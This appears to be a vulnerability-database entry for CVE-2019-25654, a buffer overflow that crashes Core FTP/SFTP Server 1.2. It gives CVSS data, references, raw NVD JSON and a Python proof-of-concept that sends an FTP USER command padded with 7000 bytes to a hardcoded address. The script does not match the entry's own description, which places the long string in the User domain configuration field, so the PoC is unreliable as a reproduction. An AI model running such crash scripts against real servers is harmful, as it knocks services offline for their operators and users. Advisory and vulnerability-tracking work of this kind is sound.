CVE-2019-25654

Description

Core FTP/SFTP Server 1.2 contains a buffer overflow vulnerability that allows attackers to crash the service by supplying an excessively long string in the User domain field. Attackers can paste a malicious payload containing 7000 bytes of data into the domain configuration to trigger an application crash and deny service.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:coreftp:core_ftp:1.2:*:*:*:*:*:*:* - VULNERABLE

Core FTP/SFTP Server 1.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket

# Target settings
TARGET_IP = "192.168.1.10"
TARGET_PORT = 21

# Generate payload: 7000 bytes of 'A'
payload = b"A" * 7000

try:
    # Establish connection
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((TARGET_IP, TARGET_PORT))
    print(f"[+] Connected to {TARGET_IP}")

    # Receive server banner
    s.recv(1024)

    # Send malicious payload to trigger buffer overflow in User domain field
    # Note: The exact command sequence may vary based on specific implementation
    s.send(b"USER " + payload + b"\r\n")
    print("[+] Payload sent, checking if service crashed...")

    # Clean up
    s.close()

except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25654
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25654
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25654/
[4] VulDB https://vuldb.com/cve/CVE-2019-25654
[5] http://www.coreftp.com/
[6] http://www.coreftp.com/server/download/archive/CoreFTPServer589.42.exe
[7] https://www.exploit-db.com/exploits/46371
[8] https://www.vulncheck.com/advisories/core-ftp-sftp-server-denial-of-service-via-buffer-overflow

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25654", "sourceIdentifier": "[email protected]", "published": "2026-03-30T12:16:18.150", "lastModified": "2026-04-08T16:18:03.787", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Core FTP/SFTP Server 1.2 contains a buffer overflow vulnerability that allows attackers to crash the service by supplying an excessively long string in the User domain field. Attackers can paste a malicious payload containing 7000 bytes of data into the domain configuration to trigger an application crash and deny service."}, {"lang": "es", "value": "Servidor Core FTP/SFTP 1.2 contiene una vulnerabilidad de desbordamiento de búfer que permite a los atacantes bloquear el servicio al proporcionar una cadena excesivamente larga en el campo de dominio de Usuario. Los atacantes pueden pegar una carga útil maliciosa que contiene 7000 bytes de datos en la configuración del dominio para desencadenar un bloqueo de la aplicación y denegar el servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:coreftp:core_ftp:1.2:*:*:*:*:*:*:*", "matchCriteriaId": "5D1897D5-4E23-4D27-B0BC-08E3DF8F18CE"}]}]}], "references": [{"url": "http://www.coreftp.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "http://www.coreftp.com/server/download/archive/CoreFTPServer589.42.exe", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46371", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/core-ftp-sftp-server-denial-of-service-via-buffer-overflow", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}